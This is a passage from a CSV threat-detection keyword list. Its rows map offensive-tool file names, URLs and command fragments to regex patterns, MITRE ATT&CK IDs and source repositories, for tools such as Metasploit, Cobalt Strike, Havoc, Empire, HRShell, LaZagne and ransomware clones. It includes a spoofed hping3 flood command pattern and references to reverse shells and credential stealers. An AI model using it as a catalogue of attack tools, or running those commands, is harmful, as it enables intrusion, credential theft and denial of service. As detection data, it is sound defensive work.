T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.system_info.collectors.py*",".{0,1000}hook\-infection_monkey\.system_info\.collectors\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*hook-pypsrp.py*",".{0,1000}hook\-pypsrp\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-pypykatz.py*",".{0,1000}hook\-pypykatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*hopefully it's a DA password*",".{0,1000}hopefully\sit\'s\sa\sDA\spassword.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*'Host the Phising App'*",".{0,1000}\'Host\sthe\sPhising\sApp\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*HOST/EXEGOL-01.*",".{0,1000}HOST\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Host: FUZZ.machine.org*",".{0,1000}Host\:\sFUZZ\.machine\.org.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*HostEnum.ps1*",".{0,1000}HostEnum\.ps1.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. 
it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*HostExploiter.py*",".{0,1000}HostExploiter\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*HostingCLR_inject*",".{0,1000}HostingCLR_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*HostingCLRx64.dll*",".{0,1000}HostingCLRx64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*houqingv1.0.zip*",".{0,1000}houqingv1\.0\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HOW_TO_DECRYPT.txt*",".{0,1000}HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","Hive","Hive ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*HOW_TO_DECYPHER_FILES.txt*",".{0,1000}HOW_TO_DECYPHER_FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*How-to-bypass-UAC-in-newer-Windows-versions.html*",".{0,1000}How\-to\-bypass\-UAC\-in\-newer\-Windows\-versions\.html.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*hpe_sim_76_amf_deserialization*",".{0,1000}hpe_sim_76_amf_deserialization.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hpglfhgfnhbgpjdenjgmdgoeiappafln*",".{0,1000}hpglfhgfnhbgpjdenjgmdgoeiappafln.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hping2.h*",".{0,1000}hping2\.h.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. 
hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*hping3 -*",".{0,1000}hping3\s\-.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*hping3 * --flood --frag --spoof * --destport*",".{0,1000}hping3\s.{0,1000}\s\-\-flood\s\-\-frag\s\-\-spoof\s.{0,1000}\s\-\-destport.{0,1000}","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*href=""""/"""">tor2web*",".{0,1000}href\=\""\/\""\>tor2web\<\/a\>.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*HRShell*client.py*",".{0,1000}HRShell.{0,1000}client\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*HRShell*server.py*",".{0,1000}HRShell.{0,1000}server\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*hta_evasion.hta*",".{0,1000}hta_evasion\.hta.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*HtaPowershellGenerator.*",".{0,1000}HtaPowershellGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*hta-to-javascript-crypter*",".{0,1000}hta\-to\-javascript\-crypter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - 
T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*HtaVBSGenerator.*",".{0,1000}HtaVBSGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*htdigest2john.py*",".{0,1000}htdigest2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*htdocs/database/jasmin_db.sql*",".{0,1000}htdocs\/database\/jasmin_db\.sql.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*html/js/beacons.js*",".{0,1000}html\/js\/beacons\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*html/scripts/merlin.js*",".{0,1000}html\/scripts\/merlin\.js.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Html-Injection-Payloads.*",".{0,1000}Html\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - 
TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Html-Injection-Read-File-Payloads.*",".{0,1000}Html\-Injection\-Read\-File\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*HTMLSmuggler-main*",".{0,1000}HTMLSmuggler\-main.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*HTool-Lazagne*",".{0,1000}HTool\-Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*htshells-master*",".{0,1000}htshells\-master.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http* | hakrawler -d *",".{0,1000}http.{0,1000}\s\|\shakrawler\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*http*/127.0.0.1*:1337*",".{0,1000}http.{0,1000}\/127\.0\.0\.1.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 
T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http*/alertmsg.zip*",".{0,1000}http.{0,1000}\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*http*/charlotte.dll*",".{0,1000}http.{0,1000}\/charlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*http*/demon.dll",".{0,1000}http.{0,1000}\/demon\.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*http*/demon.exe",".{0,1000}http.{0,1000}\/demon\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*http*/demos/butcher/index.html*",".{0,1000}http.{0,1000}\/demos\/butcher\/index\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http*/john/Test/raw/master/*",".{0,1000}http.{0,1000}\/john\/Test\/raw\/master\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*http*/localhost*:1337*",".{0,1000}http.{0,1000}\/localhost.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 
T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http*/zha0gongz1*",".{0,1000}http.{0,1000}\/zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 